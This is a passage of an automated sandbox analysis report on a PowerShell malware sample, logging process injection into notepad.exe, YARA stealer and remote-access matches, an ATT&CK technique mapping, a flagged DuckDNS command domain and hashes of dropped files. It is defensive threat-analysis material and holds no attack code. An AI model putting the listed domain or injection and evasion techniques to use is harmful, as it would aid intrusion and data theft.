              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301E0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301E1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301E2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301E3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301E4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301E5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301E6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301E7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301E8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301E9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301EAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301EBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301ECJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301EDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301EEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301EFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301F0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301F1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301F2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301F3Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\notepad.exe C:\Windows\System32\notepad.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\System32\notepad.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

Source: Yara match | File source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.notepad.exe.28858ef0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.notepad.exe.28858f7ce78.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.2890687751.0000028858EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2890793709.0000028858F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: notepad.exe PID: 384, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match | File source: amsi64_6688.amsi.csv, type: OTHER
Source: Yara match | File source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.notepad.exe.28858ef0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.notepad.exe.28858f7ce78.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.2890687751.0000028858EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2890793709.0000028858F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: notepad.exe PID: 384, type: MEMORYSTR

MITRE ATT&CK Matrix

The matrix is listed per tactic column; a number in brackets after a technique is the count of matching signatures shown in the matrix, techniques without a number had no match.

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: PowerShell [1], Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
Persistence: DLL Side-Loading [1], Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Privilege Escalation: Process Injection [411], DLL Side-Loading [1], Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Defense Evasion: Masquerading [1], Disable or Modify Tools [1], Virtualization/Sandbox Evasion [31], Process Injection [411], Deobfuscate/Decode Files or Information [1], Obfuscated Files or Information [1], Software Packing [3], DLL Side-Loading [1]
Credential Access: Input Capture [1], LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: Process Discovery [1], Virtualization/Sandbox Evasion [31], Application Window Discovery [1], File and Directory Discovery [1], System Information Discovery [13], Wi-Fi Discovery, Remote System Discovery, System Owner/User Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
Collection: Input Capture [1], Archive Collected Data [11], Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Command and Control: Encrypted Channel [1], Application Layer Protocol [1], Steganography, Protocol Impersonation, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| quark.ps1 | 5% | ReversingLabs | Script.Trojan.Generic | |
| quark.ps1 | 7% | Virustotal | | Browse |

No Antivirus matches
No Antivirus matches
No Antivirus matches

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| jdokds.duckdns.org | 5% | Virustotal | | Browse |

No contacted domains info

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| jdokds.duckdns.org | true | | unknown |

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://github.com/DARKNOSY/Rush-PowerShell-Obfuscator | quark.ps1 | false | | high |
| https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.2888967329.0000022400001000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.2888967329.0000022400001000.00000004.00000800.00020000.00000000.sdmp | false | | high |

No contacted IP infos
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1429328
                    Start date and time:2024-04-21 23:26:08 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 17s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:6
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:quark.ps1
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winPS1@4/10@0/0
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 12
                    • Number of non-executed functions: 3
                    Cookbook Comments:
                    • Found application associated with file extension: .ps1
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.
                    • Report size getting too big, too many NtWriteVirtualMemory calls found.
| Time | Type | Description |
|---|---|---|
| 23:27:13 | API Interceptor | 58x Sleep call for process: powershell.exe modified |
                    No context
                    Process:C:\Windows\System32\notepad.exe
                    File Type:CSV text
                    Category:dropped
                    Size (bytes):654
                    Entropy (8bit):5.380476433908377
                    Encrypted:false
                    SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                    MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                    SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                    SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                    SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):9434
                    Entropy (8bit):4.9243637703272345
                    Encrypted:false
                    SSDEEP:192:exoe5lpOdxoe56ib49Vsm5emdagkjDt4iWN3yBGHB9smMdcU6CBdcU6Ch9smPpOU:cVib49Vkjh4iUx4cYKib4o
                    MD5:EF4099FCAB6D29945272316889156337
                    SHA1:5AAFAD4581D21179B892604BEBD6038792F8CBD6
                    SHA-256:A86220AB1F2A5498457C8801DFCBB2FE3EA6977378CE7E3EEBD007336AFDB3BC
                    SHA-512:EC9BB5508D39E6C038878F789DE84F7FBDC87CD20AE3EF81D68BC6589784ADB98EDCDEBF544A463C0AB2F01F52B743803A49A4F3A54FD3D003851B7DEEB8014C
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):64
                    Entropy (8bit):1.1940658735648508
                    Encrypted:false
                    SSDEEP:3:Nlllul774/lL:NllUwt
                    MD5:3BD40D4BDD7802424FE8F2DC2A41C196
                    SHA1:88F355EA9D58C5A00B2EBB0DC3127C0C13052631
                    SHA-256:FCF55501F03C9B5E24796B8FE3656143E97D7A5FD0300387C1960C226C74076A
                    SHA-512:67734D54D327379C259DB7E0576BE2A4B597CB2F0B9E881AA1FC2B55F375BB5862122579B0B5EC7DED7A7875C2AC7668033355772CBB8311A8A86924153D59B2
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview:@...e................................................@..........
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):6222
                    Entropy (8bit):3.7043053775447103
                    Encrypted:false
                    SSDEEP:48:PL1b3UCwbU2K+PsukvhkvklCyw3n2vEoYkolzySogZoKPEoYkolWySogZo+1:pjUCVolkvhkvCCtBoYkoVHgoYkoGH1
                    MD5:A98532F4187D385C2FBF11A37906FD5F
                    SHA1:EE177E8EDADFB8D18FE1EB2FDDAE95B0ACF28248
                    SHA-256:32A26D22832A53FE195E1F6CE106124C2BE2900CE33B6466F19053CC71CB3213
                    SHA-512:1E5715D486B3FEAA42D36A3D6A571E3CEA3320CE80041EFD7EE7A60C92C46F3F5138BA71994E51911B53CF325861CEA48CE36DE05A9CDF5980F86032DF8E50D1
                    Malicious:false
                    Preview:...................................FL..................F.".. ...d..........2...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......Po.2.....(.2.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.XV.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......XX...Roaming.@......DWSl.XX.....C.....................1.}.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.XV.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.XV.....E......................?..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.XV.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.XV.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.X\.....q...........
